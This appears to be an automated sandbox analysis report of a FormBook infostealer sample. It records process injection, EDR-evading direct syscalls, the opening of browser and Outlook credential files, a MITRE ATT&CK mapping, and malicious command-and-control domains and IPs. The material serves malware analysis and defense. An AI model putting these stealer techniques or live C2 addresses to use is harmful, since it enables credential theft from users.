            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtCreateUserProcess: Direct from: 0x7746371C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtQuerySystemInformation: Direct from: 0x774648CC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtCreateKey: Direct from: 0x77462C6C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtSetInformationThread: Direct from: 0x77462B4C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtOpenSection: Direct from: 0x77462E0C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtCreateFile: Direct from: 0x77462FEC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtOpenFile: Direct from: 0x77462DCC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtQueryInformationToken: Direct from: 0x77462CAC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtTerminateThread: Direct from: 0x77462FCC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtOpenKeyEx: Direct from: 0x77462B9C
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe protection: read write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Thread register set: target process: 348
            Source: C:\Windows\SysWOW64\RpcPing.exe | Thread APC queued: target process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 69C008
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00436CD7 LogonUserW
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xBzBOQwywT.exe"
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: xBzBOQwywT.exe, IpIaYUETnYWFH.exe, 00000004.00000000.1729912660.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000002.3364368636.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364832974.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: IpIaYUETnYWFH.exe, 00000004.00000000.1729912660.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000002.3364368636.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364832974.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: IpIaYUETnYWFH.exe, 00000004.00000000.1729912660.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000002.3364368636.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364832974.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
            Source: IpIaYUETnYWFH.exe, 00000004.00000000.1729912660.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000002.3364368636.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364832974.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: xBzBOQwywT.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00472C3F GetUserNameW
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RpcPing.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: xBzBOQwywT.exe | Binary or memory string: WIN_XP
            Source: xBzBOQwywT.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: xBzBOQwywT.exe | Binary or memory string: WIN_XPe
            Source: xBzBOQwywT.exe | Binary or memory string: WIN_VISTA
            Source: xBzBOQwywT.exe | Binary or memory string: WIN_7
            Source: xBzBOQwywT.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
            Mitre Att&ck Matrix (one row per rank of techniques; the number in parentheses is the count shown beside a matched technique in the report, cells without a number were not matched):

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (2) | Native API (2) | DLL Side-Loading (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (1) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (4) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
            Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | Valid Accounts (2) | Abuse Elevation Control Mechanism (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (21) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Email Collection (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Valid Accounts (2) | Obfuscated Files or Information (3) | NTDS | System Information Discovery (16) | Distributed Component Object Model | Input Capture (21) | Application Layer Protocol (4) | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Access Token Manipulation (21) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (141) | SSH | Clipboard Data (3) | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Process Injection (412) | Valid Accounts (2) | Cached Domain Credentials | Virtualization/Sandbox Evasion (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (2) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (21) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (412) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1551188; sample: xBzBOQwywT.exe; start date: 07/11/2024; architecture: WINDOWS; score: 100), rendered as a text tree:

Start (sample)
  contacts: www.demovix.xyz; www.animekuid.xyz; 14 other IPs or domains
    www.animekuid.xyz: Performs DNS queries to domains with low reputation
  signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
  started xBzBOQwywT.exe
    signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    started svchost.exe
      signatures: Maps a DLL or memory area into another process
      injected IpIaYUETnYWFH.exe
        signatures: Found direct / indirect Syscall (likely to bypass EDR)
        started RpcPing.exe
          signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          injected IpIaYUETnYWFH.exe
            contacts: www.shanhaiguan.net (156.242.132.82, ports 50002, 50003, 50004; POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles); www.falconclub.online (74.208.236.25, ports 49712, 49713, 49714; ONEANDONE-ASBrauerstrasse48DE, United States); 4 other IPs or domains
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
          started firefox.exe

Antivirus detection for the submitted sample (Source | Detection | Scanner | Label):
xBzBOQwywT.exe | 71% | ReversingLabs | Win32.Backdoor.FormBook
xBzBOQwywT.exe | 100% | Avira | TR/AD.Swotter.xlnzp
xBzBOQwywT.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
156.242.132.82 | www.shanhaiguan.net | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
208.91.197.27 | www.palcoconnector.net | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
84.32.84.32 | es-lidl.online | Lithuania | 33922 | NTT-LT-ASLT | true
74.208.236.25 | www.falconclub.online | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
3.33.130.190 | doggieradio.net | United States | 8987 | AMAZONEXPANSIONGB | true
199.192.19.19 | www.demovix.xyz | United States | 22612 | NAMECHEAP-NETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1551188
Start date and time: 2024-11-07 15:25:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xBzBOQwywT.exe (renamed because the original name is a hash value)
Original Sample Name: 648cf23613834f4fba89ced0a881139a1883bf00c1c12172fbc7ee53a143e5ef.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/6
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 54
• Number of non-executed functions: 297
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target IpIaYUETnYWFH.exe, PID 5368 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: xBzBOQwywT.exe
Analysis events (Time | Type | Description):
09:27:59 | API Interceptor | 6093668x Sleep call for process: RpcPing.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      156.242.132.82N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/b6g5/
                                                                      PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/p2q3/
                                                                      NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/p2q3/
                                                                      DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/p2q3/
                                                                      PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/p2q3/
                                                                      208.91.197.27Hesap.exeGet hashmaliciousFormBookBrowse
                                                                      • www.martaschrimpf.info/qr9f/
                                                                      XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                      • www.yushaliu.online/fjsq/
                                                                      D7R Image_capture 28082024 JPEG FILE.exeGet hashmaliciousFormBookBrowse
                                                                      • www.7fty.space/mh5s/
                                                                      ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                                      • www.willtriallawyers.net/tk4w/
                                                                      QNBSWIFT.exeGet hashmaliciousFormBookBrowse
                                                                      • www.martaschrimpf.info/qr9f/
                                                                      Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.themessageart.online/1j0s/
                                                                      rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                      • www.molepunch.online/ya3k/
                                                                      EKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                      • www.martaschrimpf.info/qr9f/
                                                                      3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                      • www.crochetpets.online/25cq/
                                                                      EqszHzzNn5.exeGet hashmaliciousFormBookBrowse
                                                                      • www.antura.partners/62gk/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.falconclub.online | TUj6dgsTTR.exe | Get hash | malicious | FormBook | Browse | 74.208.236.25
www.falconclub.online | zmhPgbED7M.exe | Get hash | malicious | FormBook | Browse | 74.208.236.25
www.falconclub.online | N2Qncau2rN.exe | Get hash | malicious | FormBook | Browse | 74.208.236.25
www.demovix.xyz | TUj6dgsTTR.exe | Get hash | malicious | FormBook | Browse | 199.192.19.19
www.demovix.xyz | zmhPgbED7M.exe | Get hash | malicious | FormBook | Browse | 199.192.19.19
www.demovix.xyz | N2Qncau2rN.exe | Get hash | malicious | FormBook | Browse | 199.192.19.19
www.palcoconnector.net | N2Qncau2rN.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
www.palcoconnector.net | AWB_5771388044 Documenti di spedizione.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
www.palcoconnector.net | ncOLm62YLB.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
www.palcoconnector.net | EGCS-875-S5-SMO M2A.exe | Get hash | malicious | FormBook | Browse | 208.91.197.27
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
POWERLINE-AS-APPOWERLINEDATACENTERHK | h0r0zx00x.x86.elf | Get hash | malicious | Mirai | Browse | 156.251.7.171
POWERLINE-AS-APPOWERLINEDATACENTERHK | Shipping documents..exe | Get hash | malicious | FormBook | Browse | 154.92.61.37
POWERLINE-AS-APPOWERLINEDATACENTERHK | sora.sh4.elf | Get hash | malicious | Mirai | Browse | 154.216.83.133
POWERLINE-AS-APPOWERLINEDATACENTERHK | nullnet_load.sh4.elf | Get hash | malicious | Mirai | Browse | 156.243.251.8
POWERLINE-AS-APPOWERLINEDATACENTERHK | nullnet_load.spc.elf | Get hash | malicious | Mirai | Browse | 156.242.206.38
POWERLINE-AS-APPOWERLINEDATACENTERHK | nullnet_load.arm.elf | Get hash | malicious | Mirai | Browse | 156.250.157.174
